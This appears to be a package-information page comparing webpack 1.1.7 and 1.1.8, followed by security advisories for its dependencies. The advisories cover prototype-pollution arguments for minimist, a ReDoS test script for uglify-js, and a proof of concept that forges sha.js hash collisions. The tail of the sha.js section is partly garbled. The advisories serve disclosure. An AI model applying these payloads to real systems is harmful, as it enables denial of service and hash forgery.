Webpack versions 1.1.8 and 1.1.7 are both iterations of a module bundler designed for modern web development. Primarily, they aim to package CommonJs and AMD modules for browser use, enabling developers to split codebases into manageable bundles, which can be loaded on demand. This functionality is crucial for optimizing website performance and user experience. Both versions support the use of loaders, which preprocess various file types such as JSON, Jade, CoffeeScript, CSS, and LESS, alongside custom transformations that can be defined.
The core functionalities and dependencies remain consistent between the versions, with dependencies like async, clone, mkdirp, esprima, tapable, optimist, uglify-js, webpack-core, enhanced-resolve, and node-libs-browser being identical. The same is true for the development dependencies used for testing and local development, including tools like Mocha, Should, Express, and various loaders for different file types such as CSS, raw files, URLs, and more.
The only noticeable alteration between webpack 1.1.7 and webpack 1.1.8 is the release date. Version 1.1.8 was published on April 19, 2014, following the release of version 1.1.7 on April 17, 2014. Webpack developers should consider using the latest version for potential bug fixes, stability improvements, or minor refinements that are not explicitly documented but contribute to the overall reliability of the bundler. While there are no explicitly stated feature additions or dependency updates, staying current ensures developers benefit from the most polished and up-to-date tooling for their projects.
All the vulnerabilities related to the version 1.1.8 of the package
Prototype Pollution in minimist
Affected versions of minimist are vulnerable to prototype pollution. Arguments are not properly sanitized, allowing an attacker to modify the prototype of Object, causing the addition or modification of an existing property that will exist on all objects.
Parsing the argument --__proto__.y=Polluted adds a y property with value Polluted to all objects. The argument --__proto__=Polluted raises and uncaught error and crashes the application.
This is exploitable if attackers have control over the arguments being passed to minimist.
Upgrade to versions 0.2.1, 1.2.3 or later.
Prototype Pollution in minimist
Minimist prior to 1.2.6 and 0.2.4 is vulnerable to Prototype Pollution via file index.js, function setKey() (lines 69-95).
Regular Expression Denial of Service in uglify-js
Versions of uglify-js prior to 2.6.0 are affected by a regular expression denial of service vulnerability when malicious inputs are passed into the parse() method.
var u = require('uglify-js');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
u.parse("var a = " + genstr(process.argv[2], "1") + ".1ee7;");
$ time node test.js 10000
real 0m1.091s
user 0m1.047s
sys 0m0.039s
$ time node test.js 80000
real 0m6.486s
user 0m6.229s
sys 0m0.094s
Update to version 2.6.0 or later.
sha.js is missing type checks leading to hash rewind and passing on crafted data
This is the same as GHSA-cpq7-6gpm-g9rc but just for sha.js, as it has its own implementation.
Missing input type checks can allow types other than a well-formed Buffer or string, resulting in invalid values, hanging and rewinding the hash state (including turning a tagged hash into an untagged hash), or other generally undefined behaviour.
See PoC
const forgeHash = (data, payload) => JSON.stringify([payload, { length: -payload.length}, [...data]])
const sha = require('sha.js')
const { randomBytes } = require('crypto')
const sha256 = (...messages) => {
const hash = sha('sha256')
messages.forEach((m) => hash.update(m))
return hash.digest('hex')
}
const validMessage = [randomBytes(32), randomBytes(32), randomBytes(32)] // whatever
const payload = forgeHash(Buffer.concat(validMessage), 'Hashed input means safe')
const receivedMessage = JSON.parse(payload) // e.g. over network, whatever
console.log(sha256(...validMessage))
console.log(sha256(...receivedMessage))
console.log(receivedMessage[0])
Output:
638d5bf3ca5d1decf7b78029f1c4a58558143d62d0848d71e27b2a6ff312d7c4
638d5bf3ca5d1decf7b78029f1c4a58558143d62d0848d71e27b2a6ff312d7c4
Hashed input means safe
Or just:
> require('sha.js')('sha256').update('foo').digest('hex')
'2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae'
> require('sha.js')('sha256').update('fooabc').update({length:-3}).digest('hex')
'2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae'
{length: -x}. This is behind the PoC above, also this way an attacker can turn a tagged hash in cryptographic libraries into an untagged hash.{ length: buf.length, ...buf, 0: buf[0] + 256 }
This will result in the same hash as of buf, but can be treated by other code differently (e.g. bn.js){length:'1e99'}